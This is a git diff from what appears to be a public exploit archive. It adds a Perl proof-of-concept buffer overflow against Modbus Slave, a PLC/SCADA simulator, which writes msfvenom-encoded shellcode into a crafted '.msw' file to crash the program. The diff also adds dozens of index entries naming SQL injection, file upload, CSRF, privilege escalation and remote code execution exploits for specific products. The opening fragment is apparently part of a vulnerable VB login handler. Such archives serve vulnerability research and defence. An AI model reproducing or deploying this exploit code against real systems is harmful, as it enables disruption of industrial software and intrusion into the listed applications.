LoginForm1.Close() +#39 Else +#40 visibleMenu("true", "not admin") +#41 Form1.LogoutToolStripMenuItem.Text = "Logout" +#42 LoginForm1.Close() +#43 End If +#44 +#45 Else +#46 MsgBox("Acount doest not exits!", MsgBoxStyle.Information) +#47 End If +#48 Catch ex As Exception +#49 MsgBox(ex.Message) +#50 End Try +#51 con.Close() +#52 da.Dispose() +#53 End Sub +#.... \ No newline at end of file diff --git a/exploits/windows_x86/local/45710.pl b/exploits/windows_x86/local/45710.pl new file mode 100755 index 000000000..6aa446d2b --- /dev/null +++ b/exploits/windows_x86/local/45710.pl @@ -0,0 +1,43 @@ +# Exploit Title: Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC) +# Author: Kağan Çapar +# Discovery Date: 2018-10-27 +# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe +# Vendor Homepage : https://www.modbustools.com +# Tested Version: 7 +# Tested on OS: Windows XP SP3 *ENG +# other version should be affected +# About software : Modbus Slave is for simulating up to 32 slave devices in 32 windows!. +# Speed up your PLC programming with this simulating tools. Used for SCADA systems. +# Modbus is a serial communications protocol originally published by Schneider Electric +# Steps to Reproduce: Run the perl exploit script, it will create a new +# file with the name "exploit.msw" and Drag on to "mbslave.exe" +# you will see a loop and crash on software +# Greetz : cwd-onkan-badko-key-akkus + +# ! /usr/bin/perl + +# Dump of assembler code for function loop: +# 0x0000555555558030 <+0>: mov $0x1e3b563c,%ebx +# 0x0000555555558035 <+5>: fld %st(4) +# 0x0000555555558037 <+7>: fnstenv -0xc(%rsp) +# 0x000055555555803b <+11>: pop %rax +# 0x000055555555803c <+12>: sub %ecx,%ecx +# 0x000055555555803e <+14>: mov $0x1,%cl +# 0x0000555555558040 <+16>: xor %ebx,0x14(%rax) +# 0x0000555555558043 <+19>: add $0x4,%eax +# 0x0000555555558046 <+22>: add 0x10(%rax),%ebx +# 0x0000555555558049 <+25>: fisubs 0xe0d0(%rbx) + +# msfvenom -p generic/tight_loop --platform windows_86 -f perl -e x86/shikata_ga_nai +# print /x &loop +# $1 = 0x555555558030 + +open(code, ">exploit.msw"); +binmode(code); +$loop = +"\xbb\x3c\x56\x3b\x1e\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9" . +"\xb1\x01\x31\x58\x14\x83\xc0\x04\x03\x58\x10\xde\xa3\xd0" . +"\xe0"; + +print code $loop; +close(code); \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 61af09461..4e22bdb53 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6158,6 +6158,13 @@ id,file,description,date,author,type,platform,port 45679,exploits/windows_x86-64/dos/45679.py,"BORGChat 1.0.0 build 438 - Denial of Service (PoC)",2018-10-25,"Ihsan Sencan",dos,windows_x86-64, 45670,exploits/windows_x86/dos/45670.txt,"Adult Filter 1.0 - Denial of Service (PoC)",2018-10-24,"Beren Kuday GÖRÜN",dos,windows_x86, 45694,exploits/linux/dos/45694.c,"libtiff 4.0.9 - Decodes Arbitrarily Sized JBIG into a Target Buffer",2018-10-25,"Google Security Research",dos,linux, +45705,exploits/windows_x86-64/dos/45705.py,"Navicat 12.0.29 - 'SSH' Denial of Service (PoC)",2018-10-29,"Rafael Alfaro",dos,windows_x86-64, +45708,exploits/windows_x86-64/dos/45708.py,"AlienIP 2.41 - Denial of Service (PoC)",2018-10-29,"Arturo de la Cruz Tellez",dos,windows_x86-64, +45711,exploits/windows_x86-64/dos/45711.py,"Local Server 1.0.9 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows_x86-64, +45714,exploits/linux/dos/45714.c,"systemd - reexec State Injection",2018-10-29,"Google Security Research",dos,linux, +45715,exploits/linux/dos/45715.txt,"systemd - chown_one() can Dereference Symlinks",2018-10-29,"Google Security Research",dos,linux, +45716,exploits/windows/dos/45716.txt,"ASRock Drivers - Privilege Escalation",2018-10-29,SecureAuth,dos,windows, +45732,exploits/windows/dos/45732.txt,"Modbus Slave 7.0.0 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10054,6 +10061,8 @@ id,file,description,date,author,type,platform,port 45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86, 45696,exploits/windows/local/45696.rb,"WebEx - Local Service Permissions Exploit (Metasploit)",2018-10-25,Metasploit,local,windows, 45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple, +45709,exploits/windows_x86-64/local/45709.vb,"School Equipment Monitoring System 1.0 - 'login' SQL Injection",2018-10-29,"Ihsan Sencan",local,windows_x86-64, +45710,exploits/windows_x86/local/45710.pl,"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)",2018-10-29,"Kağan Çapar",local,windows_x86, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16897,6 +16906,7 @@ id,file,description,date,author,type,platform,port 45658,exploits/windows/remote/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write",2018-10-23,hyp3rlinx,remote,windows, 45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,25 45695,exploits/windows/remote/45695.rb,"WebExec - Authenticated User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows, +45712,exploits/linux/remote/45712.py,"Paramiko 2.4.1 - Authentication Bypass",2018-10-29,"Adam Brown",remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40214,3 +40224,26 @@ id,file,description,date,author,type,platform,port 45699,exploits/php/webapps/45699.txt,"MPS Box 0.1.8.0 - Arbitrary File Upload",2018-10-26,"Ihsan Sencan",webapps,php, 45700,exploits/php/webapps/45700.txt,"Delta Sql 1.8.2 - 'id' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php, 45701,exploits/php/webapps/45701.txt,"Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php, +45703,exploits/php/webapps/45703.txt,"Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php, +45704,exploits/php/webapps/45704.txt,"Grapixel New Media 2 - 'pageref' SQL Injection",2018-10-29,"Berk Dusunur",webapps,php, +45706,exploits/aspx/webapps/45706.vb,"Library Management System 1.0 - 'frmListBooks' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,aspx, +45707,exploits/php/webapps/45707.txt,"Open Faculty Evaluation System 7 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php, +45713,exploits/php/webapps/45713.txt,"Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php, +45717,exploits/php/webapps/45717.txt,"MTGAS MOGG Web Simulator Script - SQL Injection",2018-10-29,"Meisam Monsef",webapps,php,80 +45718,exploits/php/webapps/45718.txt,"Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery",2018-10-29,"Ihsan Sencan",webapps,php,80 +45719,exploits/php/webapps/45719.txt,"Curriculum Evaluation System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80 +45720,exploits/php/webapps/45720.txt,"Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80 +45721,exploits/php/webapps/45721.txt,"Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80 +45722,exploits/php/webapps/45722.txt,"School Event Management System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80 +45723,exploits/php/webapps/45723.txt,"School Event Management System 1.0 - Arbitrary File Upload",2018-10-29,"Ihsan Sencan",webapps,php,80 +45724,exploits/php/webapps/45724.txt,"School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,80 +45725,exploits/php/webapps/45725.txt,"School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,80 +45726,exploits/php/webapps/45726.txt,"School Attendance Monitoring System 1.0 - Arbitrary File Upload",2018-10-29,"Ihsan Sencan",webapps,php,80 +45727,exploits/php/webapps/45727.txt,"School Attendance Monitoring System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80 +45728,exploits/php/webapps/45728.txt,"PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80 +45729,exploits/php/webapps/45729.txt,"RhinOS CMS 3.x - Arbitrary File Download",2018-10-29,"Ihsan Sencan",webapps,php,80 +45730,exploits/php/webapps/45730.txt,"E-Negosyo System 1.0 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80 +45731,exploits/php/webapps/45731.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80 +45733,exploits/php/webapps/45733.txt,"SaltOS Erp Crm 3.1 r8126 - SQL Injection (2)",2018-10-29,"Ihsan Sencan",webapps,php,80 +45734,exploits/php/webapps/45734.txt,"SaltOS Erp Crm 3.1 r8126 - Database File Download",2018-10-29,"Ihsan Sencan",webapps,php,80 +45735,exploits/php/webapps/45735.txt,"K-iwi Framework 1775 - SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,80